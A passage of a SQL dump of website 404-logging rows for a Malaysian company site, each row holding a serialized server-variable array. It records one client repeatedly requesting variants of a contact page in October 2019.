okeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025868.9436\";s:12:\"REQUEST_TIME\";s:10:\"1571025868\";}}','notice','2019-10-14 04:04:31','2019-10-14 04:04:29',35021776,36827048,'https://bintara.com.my/contact_us.htm',1,0,'183.197.116.193'),(28005,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/contact_us.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/contact_us.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/contact_us.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzye64dmMiXPBY9-n5MgAAAIU\";s:12:\"REDIRECT_URL\";s:16:\"/contact_us.html\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24179\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/contact_us.html\";s:10:\"SCRIPT_URL\";s:16:\"/contact_us.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzye64dmMiXPBY9-n5MgAAAIU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025865.6229\";s:12:\"REQUEST_TIME\";s:10:\"1571025865\";}}','notice','2019-10-14 04:04:28','2019-10-14 04:04:26',35022864,36820992,'https://bintara.com.my/contact_us.html',1,0,'183.197.116.193'),(28004,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"/contactus\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/contactus\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/contactus\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzxcXveCZq8UxW3bMmgQAAAUo\";s:12:\"REDIRECT_URL\";s:10:\"/contactus\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24135\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/contactus\";s:10:\"SCRIPT_URL\";s:10:\"/contactus\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzxcXveCZq8UxW3bMmgQAAAUo\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025861.2271\";s:12:\"REQUEST_TIME\";s:10:\"1571025861\";}}','notice','2019-10-14 04:04:24','2019-10-14 04:04:22',35022600,36825040,'https://bintara.com.my/contactus',1,0,'183.197.116.193'),(28003,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/contactus.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/contactus.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzwb0j4KqzOPWDFBPVbAAAAhI\";s:12:\"REDIRECT_URL\";s:14:\"/contactus.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24120\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.asp\";s:10:\"SCRIPT_URL\";s:14:\"/contactus.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzwb0j4KqzOPWDFBPVbAAAAhI\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025857.6609\";s:12:\"REQUEST_TIME\";s:10:\"1571025857\";}}','notice','2019-10-14 04:04:20','2019-10-14 04:04:18',35024304,36823144,'https://bintara.com.my/contactus.asp',1,0,'183.197.116.193'),(28002,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/contactus.aspx\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/contactus.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/contactus.aspx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzvWQflmQKZNUpCueiTgAAAMk\";s:12:\"REDIRECT_URL\";s:15:\"/contactus.aspx\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24101\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/contactus.aspx\";s:10:\"SCRIPT_URL\";s:15:\"/contactus.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzvWQflmQKZNUpCueiTgAAAMk\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025853.7426\";s:12:\"REQUEST_TIME\";s:10:\"1571025853\";}}','notice','2019-10-14 04:04:16','2019-10-14 04:04:14',35021760,36827176,'https://bintara.com.my/contactus.aspx',1,0,'183.197.116.193'),(28001,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/contactus.jsp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.jsp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/contactus.jsp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzunBxr6HKHzoM2bpLmgAAAEE\";s:12:\"REDIRECT_URL\";s:14:\"/contactus.jsp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24088\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.jsp\";s:10:\"SCRIPT_URL\";s:14:\"/contactus.jsp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzunBxr6HKHzoM2bpLmgAAAEE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025850.8469\";s:12:\"REQUEST_TIME\";s:10:\"1571025850\";}}','notice','2019-10-14 04:04:12','2019-10-14 04:04:11',35024304,36823144,'https://bintara.com.my/contactus.jsp',1,0,'183.197.116.193'),(28000,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/contactus.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/contactus.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaPztGQflmQKZNUpCueiSwAAANg\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/contactus.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPztGQflmQKZNUpCueiSwAAANg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24033\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.php\";s:10:\"SCRIPT_URL\";s:14:\"/contactus.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPztGQflmQKZNUpCueiSwAAANg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025844.4416\";s:12:\"REQUEST_TIME\";s:10:\"1571025844\";}}','notice','2019-10-14 04:04:08','2019-10-14 04:04:05',35031552,36837592,'https://bintara.com.my/contactus.php',1,0,'183.197.116.193'),(27999,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/contactus.htm\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.htm\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/contactus.htm\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzr2QflmQKZNUpCueiSQAAANA\";s:12:\"REDIRECT_URL\";s:14:\"/contactus.htm\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24009\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/contactus.htm\";s:10:\"SCRIPT_URL\";s:14:\"/contactus.htm\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzr2QflmQKZNUpCueiSQAAANA\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025839.7754\";s:12:\"REQUEST_TIME\";s:10:\"1571025839\";}}','notice','2019-10-14 04:04:03','2019-10-14 04:04:00',35024304,36823144,'https://bintara.com.my/contactus.htm',1,0,'183.197.116.193'),(27998,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/contactus.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/contactus.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/contactus.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzq@64dmMiXPBY9-n5LAAAAIg\";s:12:\"REDIRECT_URL\";s:15:\"/contactus.html\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"23995\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/contactus.html\";s:10:\"SCRIPT_URL\";s:15:\"/contactus.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzq@64dmMiXPBY9-n5LAAAAIg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025835.6596\";s:12:\"REQUEST_TIME\";s:10:\"1571025835\";}}','notice','2019-10-14 04:03:58','2019-10-14 04:03:56',35021760,36827176,'https://bintara.com.my/contactus.html',1,0,'183.197.116.193'),(27997,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/contact.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; 